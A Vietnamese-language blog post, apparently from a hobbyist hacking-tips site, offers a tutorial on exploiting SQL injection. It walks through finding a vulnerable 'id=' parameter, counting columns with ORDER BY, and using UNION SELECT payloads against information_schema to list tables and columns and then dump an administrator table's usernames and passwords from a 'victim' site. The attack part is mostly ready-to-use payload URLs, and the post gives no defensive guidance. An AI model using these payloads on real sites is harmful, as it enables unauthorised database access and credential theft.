Vũ Tiến Anh Blog
  • Wapmaster
    • Wapbuider
    • Wordpress
    • XenForo
    • Theme XenForo
    • Theme Wordpress
    • Hacking - Bảo mật
    • JohnCMS
    • All Shared Code
    • Blogger
    • Template Blogger
  • Học Lập Trình
    • Scritp - Js
    • Php - MySql
    • Html - Css
    • C#
    • Pascal
  • Đồ Hoạ
    • PhotoShop
    • PSD Tổng Hợp
    • Action
    • Fonts Tổng Hợp
    • ProShow Produce
    • Style Produce
    • AegiSub
  • Thủ Thuật
    • Thủ Thuật
    • Wapmaster
    • Blogger
    • Facebook
    • SEO
    • Kiếm Tiền Online
    • Chia Sẻ Coupon
  • Follow me
    • Twitter
    • Facebook
    • Google+
    • Youtube
    • ­­­



Chia sẽ - Trao Đổi Kiến Thức

Được tạo bởi Blogger.

LƯU TRỮ

  • ▼  2016 (109)
    • ►  tháng 11 (5)
    • ▼  tháng 9 (1)
      • [TUT] Khai Thác Sql Injection
    • ►  tháng 7 (11)
    • ►  tháng 6 (13)
    • ►  tháng 5 (47)
    • ►  tháng 4 (11)
    • ►  tháng 3 (21)

Mockup

  • TIPS THỦ THUẬT
    • FACEBOOK
    • BLOGGER
    • HACKING

Góp Ý Cho Bình Kha IT

Tên

Email *

Thông báo *

PSD-ẢNH-BÌA

[PSD-ANH-BIA][fbig2][#FF0000]

3D

THỦ THUẬT FACEBOOK

Xin chào tất cả các bạn.Cảm ơn các bạn đã ủng hộ mình trong thời gian qua.Do gần đây mình bạn nhiều việc nên không dành thời gian để phát triển Blog nữa.Mình hứa sẽ quay trở lại.Hi vọng các bạn sẽ ủng hộ mình như trước.

Liên Hệ

XEM NHIỀU

  • [TUT] Tạo Group ( Nhóm ) Không tên
    ~ Cóp ký tự vào chỗ đổi tên là ok ~~ Link ký tự:  Click Here
  • [PSD] TÂM TRẠNG 1
    DEMO: DOWNLOAD: Tại đây
  • SHARE TỔNG HỢP AVT HỢP VỚI ẢNH BÌA FACEBOOK
    ẢNH ĐẠI DIỆN:  Click Here ẢNH BÌA:             Click Here
  • [CODE] WEB HACKER CHẤT ANONYMOUS
    DEMO:DEMO:  Nhấn vào DOWNLOAD: Tại đây
  • [PSD] ẢNH BÌA HACKER 2
    DEMO: LINK DOWNLOAD: Tại Đây
  • [PSD] GIRL XINH
    DEMO: DOWNLOAD:  Click Here  
  • [SHARE] Index Hacker Max Chất
    Download Demo
  • Cách tạo blog đơn giãn với BLOGGER
    XIN CHÀO ALL HÔM NAY MÌNH SẼ HƯỚNG DẪN CÁC BẠN TẠO 1 BLOG ĐƠN GIÃN VỚI BLOGGER NHÉ ĐẦU TIÊN TA VÀO: www.blogger.com SAU ĐÓ CLICK...
  • CODE THÊM KHUNG BOX LIKE FANPAGE VÀO BLOGGER
    <script type="text/javascript"> function hide_float_left() { var content = document.getElementById('float_content_...
  • Share Tất Cả TUT Facebook Miễn Phí
    Trang chủ:  www.tranphuocan.tk Thay vì bỏ tiền ra mua các TUT & các CMND. Hôm nay mình sẽ chia sẻ tất cả các TUT trong Facebook. Hã...

TIN TỨC

Trang chủ / Thu-Thuat-Hacking / [TUT] Khai Thác Sql Injection

❤ [TUT] Khai Thác Sql Injection ❤

Unknown   05:27:00   Thu-Thuat-Hacking   0  
Popular Posts

SQL Injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về inject(tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp. SQL Injection có thể cho phép những kẻ tấn công thực hiện thao tác, delete, insert, update... trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy, lỗi này thường xảy ra trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL Server, My SQL, Oracle, DB2, Sysbase...

- Có 3 bước thực hiện :
1. Check
2. Order by
3. Union select

* Lưu ý :
- Có những website chúng ta không thấy lỗi, nhưng đừng vội bỏ qua vì chúng có thể bị admin ẩn thôi :D

- Và đừng có một suy nghĩ khi xong sqli rồi thì khai thác ngân hàng được xong làm hacker (mình thấy nhiều lắm).

- Thay vì thêm ' thì ta dùng các phép toán :
and 1=1 hiện ra website , and 1=0 hiện ra website báo lỗi --> Website đã bị lỗi SQL
- Sử dụng các phép toán kiểu true false : VD: 2 > 3 ; 2 < 3
1–1
BETWEEN 1 AND 3
‘b’ BETWEEN ‘a’ AND ‘c’
2 IN (0,1,2)
 CASA WHEN 1>0 THEN 1 END
‘ uuu’ = ‘uuu’
ISNULL(NULL) ISNULL(COT(0))
1 IS NOT NULL
NULL IS NULL
-------------------------------------------------------------------------------------------------------------------------

I. SQLI CƠ BẢN

Cần chuẩn bị : Hackbar + victim :))

Tìm những liên kết có dạng như id= và bắt đầu.

Ví dụ : http://yoursitehere.com/index.php?id=23

Tiếp theo để kiểm tra lỗi, ta dùng ' :  http://yoursitehere.com/index.php?id=23'

"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/yoursitehere/domains/yoursitehere.com/public_html/productcontent.php on line 191"

--> Đây là hiện trạng khi có lỗi hoặc tương tự.

Sau đó ta sẽ order by xem lỗi :

http://yoursitehere.com/index.php?id=23 order by 1-- -
                                             ...

--> Ví dụ đến cột lỗi là 5

Bây giờ ta dùng lệnh UNION SELECT để khai thác nó.

 http://yoursitehere.com/index.php?id=23 UNION SELECT 1,2,3,4-- -

<!> Nếu vẫn không xuất hiện hiện tượng gì thì ta thay id=23 thành id=null

Ví dụ như xuất hiện cột lỗi là 2

--> Ta khai thác với lệnh sau :  http://yoursitehere.com/index.php?id=23 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -

Ta được các tables như sau : administrator, email, link,...

Nếu ta chọn administrator : http://yoursitehere.com/index.php?id=23 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=administrator()-- -

Ta sẽ chuyển như sau để ta được như mong muốn :

http://yoursitehere.com/index.php?id=23 UNION SELECT 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e6973747261746f72()-- -

--> administrator chuyển thành mã hex, sau đó thêm 0x đằng trước.

Khi ta chạy thì ví dụ nó hiện user,pass,phone,...

-> Ta thực hiện tiếp :

http://yoursitehere.com/index.php?id=23 UNION SELECT 1,group_concat(user,0x7c,pass),3,4 from administrator-- -

--> 0x7c là hex của |

Đã xong phần sqli cơ bản.
Share Share Share
Thu-Thuat-Hacking
Administrator Administrator: Vũ Tiến Anh

Không điều gì là tồn tại mãi mãi cho đến lúc bạn ngừng cố gắng! Một cậu học sinh trung học luôn có ước mơ và hoài bão...Bạn hãy làm những việc bình thường bằng lòng say mê phi thường, thành công sẽ đến với bạn!!

CÓ THỂ BẠN SẼ THÍCH

Đang tải...

Không có nhận xét nào

Hãy để lại lời bình luận
Hãy nhận xét như một người có văn hóa
Đừng văng tục trong blog của mình
Cảm ơn bạn đã ghé thăm

Bài đăng mới hơn Bài đăng cũ hơn Trang chủ

THEO DÕI BLOG

  • Bạn bè
  • Nhận xét

COMMENT

HACKING

Liên kết - Bạn bè

CLICK ĐỂ KẾT NỐI BẠN BÈ

Homin's Blog

Khanh blog

Đinh Công Thành Blog

Văn Thắng IT

Phước An Blog

Star Trường

Cinê hay

Admin Hiếu

Nguyễn Hùng IT

Học Photoshop

Quang Thắng Blog

Xuân Việt IT

HOÀNG TUYẾN BLOG

Minh Hoàng IT

ADS

Bài đăng phổ biến

  • [TUT] Tạo Group ( Nhóm ) Không tên
    ~ Cóp ký tự vào chỗ đổi tên là ok ~~ Link ký tự:  Click Here
  • [PSD] TÂM TRẠNG 1
    DEMO: DOWNLOAD: Tại đây
  • SHARE TỔNG HỢP AVT HỢP VỚI ẢNH BÌA FACEBOOK
    ẢNH ĐẠI DIỆN:  Click Here ẢNH BÌA:             Click Here
  • [CODE] WEB HACKER CHẤT ANONYMOUS
    DEMO:DEMO:  Nhấn vào DOWNLOAD: Tại đây
  • [PSD] ẢNH BÌA HACKER 2
    DEMO: LINK DOWNLOAD: Tại Đây
  • [PSD] GIRL XINH
    DEMO: DOWNLOAD:  Click Here  
  • [SHARE] Index Hacker Max Chất
    Download Demo
  • Cách tạo blog đơn giãn với BLOGGER
    XIN CHÀO ALL HÔM NAY MÌNH SẼ HƯỚNG DẪN CÁC BẠN TẠO 1 BLOG ĐƠN GIÃN VỚI BLOGGER NHÉ ĐẦU TIÊN TA VÀO: www.blogger.com SAU ĐÓ CLICK...
  • CODE THÊM KHUNG BOX LIKE FANPAGE VÀO BLOGGER
    <script type="text/javascript"> function hide_float_left() { var content = document.getElementById('float_content_...
  • Share Tất Cả TUT Facebook Miễn Phí
    Trang chủ:  www.tranphuocan.tk Thay vì bỏ tiền ra mua các TUT & các CMND. Hôm nay mình sẽ chia sẻ tất cả các TUT trong Facebook. Hã...

Chuyên Mục Hot

Code-Web-hacker (3) Hinh-Anh (1) Mockup (2) PSD-ANH-BIA (25) Thu-Thuat- Blogger (13) Thu-Thuat-Facebook (49) Thu-Thuat-Hacking (11) Thu-Thuat-May-Tinh (1) Video (4)

Total Pageviews

Fanpage

Facebook

Thông Báo

Website đang trong tình trạng bảo trì - cập nhật Các bạn vui lòng chờ quá trình hoàn tất Cảm ơn đã ủng hộ mình
Copyright © 2015- | Thủ thuật - Công Nghệ - Webmaster | All Right Reserved.
Tags : Share Code / PhoToShop / FaceBook Tips
Blog Được Phát Triển Bởi